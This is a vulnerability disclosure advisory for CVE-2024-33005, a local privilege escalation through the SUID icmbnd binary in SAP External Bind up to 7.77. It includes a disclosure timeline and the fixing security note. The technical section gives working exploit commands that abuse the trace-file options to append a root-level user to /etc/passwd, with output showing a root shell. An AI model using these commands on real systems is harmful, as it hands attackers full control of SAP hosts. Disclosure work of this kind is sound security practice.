Local Privilege Escalation in SAP
31/10/2024 - Téléchargement
Product
SAP External Bind
Severity
Medium
Fixed Version(s)
Security Note 3438085
Affected Version(s)
≤ SAP External Bind 7.77
CVE Number
CVE-2024-33005
Authors
Description
Presentation
With the SAP S/4HANA family, SAP is providing a new generation of business applications – best-of-breed enterprise software for big data, designed to help you run simple in the digital economy.
The SAP S/4HANA family is fully built on the in-memory platform SAP HANA. Using the advanced potential of SAP HANA, these products are designed for your digital business and provide instant insight into what is going on in your business by using a single source of truth, real-time processes as well as dynamic planning and analysis. With SAP Fiori user experience and a less complex data model, they are designed to run simple, and in parallel reduce the data footprint of your company.
Issue(s)
The icmbnd
binary present on some SAP distributions has the SUID bit set and can be manipulated into writing into arbitrary files, allowing to elevate privileges to root
.
Timeline
Date | Description |
---|---|
2024.02.07 | Advisory sent to SAP |
2024.08.13 | Security note 3438085 released |
2024.10.31 | Public release |
Technical details
Local privilege escalation
Description
The icmbnd
binary is present on some SAP systems and can be found at the following path: /sapmnt/{SID}/exe/uc/linuxx86_64/icmbnd
. It has the following permissions by default, allowing members of the sapsys
group to execute it as root
.
$ ls -l /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd
-rwsr-x--- 1 root sapsys 2718568 Jan 21 2023 /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd
The following options are available:
$ ./icmbnd -h
Usage: icmbnd <options>
with the following options:
-v[ersion] display version info and exit
-S <ServerPort> listen port of the controlling program (eg. icman)
-H <hostname> hostname to bind port to (default: all names)
-l <port for listen> servicename or portnumber
-p <protocol> protocol to use (HTTP, HTTPS, SMTP)
-i <virt host idx> index of the virtual host(default: -1)
-k <keep_alive_timeout> keep alive timeout for this port
-K <proc_timeout> Processing timeout for this port
-c verify_client <val> SSL client verification option (0,1,2)
-t <trace_level> tracelevel (default:1)
-f <trace_file>] name of the tracefile (default: dev_icmbnd)
-apptrc append to existing tracefile
The -f
and -apptrc
arguments can be used to specify an arbitrary log file and append data to it. If an incorrect value is specified in mandatory options, it is reflected in this log file.
Impact
This behavior can be abused to add arbitrary data to sensitive files, such as a user to /etc/passwd
:
$ ./icmbnd -S '443' -f /etc/passwd -apptrc -p HTTP -l '443
> synacktiv:[...]:0:0::/root:/bin/sh
> abc'
icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
abc (rc=-8): NIEINVAL
IcmBndConnect: IcmConnect to port 443 failed (rc=-10)
icmbnd: IcmBndConnect (rc=-10)
The content of /etc/passwd
is then verified:
$ cat /etc/passwd
[...]
{SID}adm:x:20020:1002:SAP System Administrator:/home/{SID}adm:/bin/csh
---------------------------------------------------
trc file: "passwd", trc level: 1, release: "789"
---------------------------------------------------
[Thr 140102972481920] Wed Feb 7 10:37:06 2024
[Thr 140102972481920] systemid: 390 (AMD/Intel x86_64 with Linux)
[Thr 140102972481920] version: 7890
[Thr 140102972481920] patchlevel: 0 (server: 0)
[Thr 140102972481920] patchno: 69 (server: 74)
[Thr 140102972481920] intno 0 (server: 0)
[Thr 140102972481920] make: multithreaded, Unicode, 64 BIT
[Thr 140102972481920] pid: 29938
[Thr 140102972481920]
[Thr 140102972481920] *** WARNING => NiServerHandle: parameter invalid (strlenU(pServName) >= NI_MAX_SERVNAME_LEN) [nixx.c 263]
[Thr 140102972481920] *** ERROR => icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
[...]
Even though logs are inconsistent with the expected format for /etc/passwd
entries, the new user can still login:
$ su - synacktiv
Password:
# id
uid=0(synacktiv) gid=0(root) groups=0(root)